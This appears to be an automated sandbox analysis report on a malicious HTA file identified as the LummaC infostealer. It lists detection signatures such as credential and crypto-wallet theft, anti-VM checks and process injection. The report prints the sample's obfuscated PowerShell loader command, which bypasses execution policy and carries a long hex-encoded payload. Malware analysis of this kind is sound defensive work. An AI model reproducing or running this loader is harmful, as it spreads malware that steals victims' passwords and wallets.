Edit tour
Windows
Analysis Report
web44.mp4.hta
Overview
General Information
Detection
LummaC
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Yara detected MSILLoadEncryptedAssembly
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to modify clipboard data
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 2180 cmdline:
mshta.exe "C:\Users\ user\Deskt op\web44.m p4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 6396 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction edSX ($vXCW){re turn -spli t ($vXCW - replace '. .', '0x$& ')};$lUxv = edSX('A3 1F9B967334 9AFE3B35F8 31884A152A DF6EC95559 396B5F57D0 E445E50347 CF7164B0CD C68178F82B 54654182EB 897B522457 1B2475EFD9 70B415458A 7AF789FC1E 6F7ABBFF5A 67EBB9C103 A46965E4B3 12951120DD D87FDAA3DC 376F7EB96A 063404F5B4 5999454184 A2BBA29F2C B28EA21A2D A856B254CC 0F3BFD7FBC DF179A40AF 3A54D7A9C6 74CC8BB41E 0C4FD97C71 13C648A150 674D11EC4A D485598484 66FBB95FE0 8C8526FBFA 39058B7831 66A23AE29F 4DA0CF61DC 080DFC185C 0793C8E21A 60AF85E837 85E482739F E2AF207C5F 01D57E3797 3B82978148 1ABDCE8569 691AFD4276 B4F5A07138 F03A1BEA59 CD80A67D12 8F1F59B5F0 8CD1456090 6ADC8FC07E CEACD2CA93 6BF14DD67C 0C322A614D A8949AAE4F 3F3DD8C496 3919366C68 E97BE23A08 6EA39D6E35 67274098AE 593624ACBD 21A7AA02CD E0168602BE A805BA25CA B6368F6F34 EA5F73DE61 B4BD7C0CA3 FF765FEE92 A3FF56F66A C139EA96B5 A4189ECC72 56D4AEBE20 26C1ACAFA1 95958FBE0C F912FEE6E9 9CA63092E0 10DF6B7742 F3AC98BBD4 B06F22EC97 1C9EC6E3AB CB27953F51 DF704695B0 61AC6BEC33 C1B700DBA4 BB023B15DA 076C042FAA 3A95A07706 C8AE7E8855 3450F62468 B509FEA6D5 CB4350A584 FBB2D977F1 58D34857F2 6CCC849BE7 80CB8166B9 2B610B64C3 334FCE35D8 F1F478230D AE6C3E86CF 93844296A8 74DEEC71EC 4B6694A2AD 0018F51C25 72849BC046 EAC16B467E AB7E6229F0 3DC638AA51 0B63A4EBAC B32766940C CE7DAF1FCF 4F63C76BE1 C97A0A09F5 362D2D1417 AF18230B80 9ACD1D1F22 5F4EFC165C 55A8BC0863 46DC9D3715 EC116DE095 878D1134AD D3C14DC812 5EB0D61BEC 915BCE4B6F B0EF0A1BDB BE7E3A1F66 B8842FC060 96AF4E459E 3AB4313C47 93DCA582EC 173E0DAC64 534C8B8398 98A145779C F154674C0A E6F37B54D6 B4B13E7973 5CC2476D57 84F96960B1 0D71A61AB4 B67A58B613 90249E457F F1005BEB7A CF7A43EE27 68E04D4F6F EF537A461B 936EE4C0D1 808455EBC1 927A1E4FC8 0E91C69F01 5D288EC319 66605CA3FA C7BDFE119B 9780C54C17 2AB0102951 9B661359B0 35D477BFE7 5C71BA1D61 A3FD4C7C56 A2E76386F7 B937A5DDE3 2CCE6982DE E8E464B2F0 D40D595F50 EC1801407A DB67F18011 AE692B6F0B AA0465ACC9 1F95CC5723 04B79D3582 A2AEA5F445 3DFA1D7E39 F5531233C6 359F55D33B E19A911559 F608653DFD 08BBAF79AF 2B0917D6EE BE46595756 FB41358F33 598CCF1E7B E525921159 09F9E75477 B49B50BA1E 60CFBAECFE 4AAF4141B0 7F42C5D596 954C405EB1 72D697BDC6 3DCEBF8001 CA89829E35 4D2DA20DC9 739369899A F53E537DA7 B73870831E EFEF889845 BBDCF95016 54607CF133 DCDB9D6742 0AFC78AA90 92BD52A145 B944360F0B FECDC7D493 2028F16E87 771AC1D866 EBEC728980 3D86ED9904 AFDFBFBF5B B048929DB7 DB2AC8F63C 7EDB203F8E 1A174EBE21 57AE182E3D BDED3349D8 3D3D3BC674 5E2D5DF173 46843FF66D B2BDFC5716 E268004777 42AF6898AD 106316D223 7BE4FADEE7 11172BE9B7 93AFE37890 4EC0F53DEE 91616E5612 EDE3DFB086 3A38BAEFAC ED7F01D988 DDCA3304F1 5DB3A3C71E